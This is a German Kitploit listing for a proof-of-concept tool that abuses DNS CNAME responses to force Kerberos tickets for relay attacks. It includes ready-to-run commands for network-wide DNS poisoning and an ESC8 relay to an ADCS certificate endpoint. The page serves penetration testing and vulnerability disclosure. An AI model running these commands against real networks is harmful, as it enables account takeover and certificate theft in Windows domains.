Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
MITM6-Kerberos-CNAME-Abuse — Kerberos CNAME-Missbrauch PoC | Kitploit
Tools/GitHubGitHub/benzamir/mitm6-kerberos-cname-abuse
ExploitationLaterale BewegungWebanwendungs-ExploitationPenetrationstestsCommand and ControlAuthentifizierungRed TeamingDNS-Analyse
GitHubbenzamir/mitm6-kerberos-cname-abuse

MITM6-Kerberos-CNAME-Abuse

Kerberos CNAME-Missbrauch PoC

Repository anzeigen
10820vor 6 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Kerberos-Authentifizierungs-Relay - CNAME-Ausnutzungstechnik (PoC)

Hintergrund

Dieses Tool ist der Proof-of-Concept für die Kerberos-CNAME-Ausnutzung-Relay-Technik, basierend auf dem MITM6-Tool.

Die Forschung deckte eine Schwachstelle im Verhalten des Windows-Kerberos-Clients auf: Wenn ein DNS-CNAME-Eintrag zurückgegeben wird, folgt der Client dem Alias und erstellt die TGS-Anfrage unter Verwendung des CNAME-Hostnamens als SPN. Dies ermöglicht einem Angreifer mit einer DNS-MITM-Position, jeden Domänenbenutzer dazu zu zwingen, ein Kerberos-Ticket für einen vom Angreifer gewählten Dienst anzufordern, was On-Demand-Protokollübergreifende Relay-Angriffe gegen SMB, HTTP und andere Dienste ermöglicht, bei denen Signierung oder Kanalbindung nicht erzwungen wird.

Im Gegensatz zu früheren Kerberos-Relay-Techniken, die auf Maschinenkonten beschränkt waren oder bestimmte Bedingungen erforderten, funktioniert diese Methode zuverlässig gegen Benutzerkonten auf Standard-Windows-Konfigurationen. Microsoft milderte das Risiko durch einen Patch, der CBT auf HTTPS erzwingt und die Signierung für betroffene Protokolle standardmäßig aktiviert. Die Korrektur wird als CVE-2026-20929 nachverfolgt. Vollständige technische Details, Exploit-Walkthrough und Auswirkungsanalyse finden Sie im Blogbeitrag bei Cymulate.

Hinzugefügte CNAME-Ausnutzungsfunktionen

CNAME-Vergiftung

Verwenden Sie --cname-source, um eine bestimmte Domäne anzuvisieren, auf die das Opfer zuzugreifen versucht, oder --cname-source-all, um jede DNS-Abfrage zu vergiften. Beide erfordern --cname, um den Zielhostnamen anzugeben, der in der CNAME-Antwort verwendet wird (das Opfer wird dann ein TGS für diesen Hostnamen anfordern).

Nur-DNS-Modus

Das --only-dns-Flag deaktiviert den ursprünglichen mitm6-DHCPv6-Server und die Router-Ankündigungsfunktionalität. Dies ermöglicht die Kombination der CNAME-Vergiftung mit anderen MITM-Techniken wie ARP-Vergiftung.

Durchleitung

Die --passthrough-Option akzeptiert eine Datei mit Domänen, die zu ihren tatsächlichen IP-Adressen aufgelöst werden sollen (Format: domain:ip pro Zeile). Nützlich, um die Konnektivität zu kritischer Infrastruktur wie Domänencontrollern aufrechtzuerhalten (experimentell).

Installation

root@kitploit:~
pip install -r requirements.txt

Verwendung

CNAME-Vergiftung (Alle Domänen)

Vergiften Sie alle DNS-Abfragen mit einem CNAME, das auf das Relay-Ziel verweist:

root@kitploit:~
python mitm6-cname.py -i eth0 -d corp.local --cname-source-all --cname target.corp.local

CNAME-Vergiftung (Bestimmte Domäne)

Vergiften Sie nur Abfragen für einen bestimmten Hostnamen:

root@kitploit:~
python mitm6-cname.py -i eth0 -d corp.local --cname-source fileserver.corp.local --cname adcs.corp.local

Nur-DNS-Modus

Überspringen Sie DHCPv6/RA, wenn Sie ARP-Vergiftung für DNS-MITM verwenden:

root@kitploit:~
python mitm6-cname.py -i eth0 --only-dns -d corp.local --cname-source-all --cname target.corp.local

Beispiel: ESC8-Angriff

root@kitploit:~
# Terminal 1: CNAME-Vergiftung
python mitm6-cname.py -i eth0 -d corp.local --cname-source-all --cname adcs.corp.local

# Terminal 2: Relay zu ADCS
krbrelayx.py -t http://adcs.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template User

Danksagungen

  • Original mitm6: Dirk-jan Mollema

Getestet auf

  • Windows 10, 11
  • Windows Server 2022, 2025

Anforderungen

  • Python 3.x
  • Linux-Betriebssystem

Haftungsausschluss

Dieses Tool ist ein nicht produktionsreifer PoC, der nur für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt wird. Unautorisierter Zugriff auf Computersysteme ist illegal. Verwendung auf eigenes Risiko und nur gegen Systeme, für die Sie ausdrückliche Erlaubnis zum Testen haben.

Lizenz

MIT

Tool herunterladen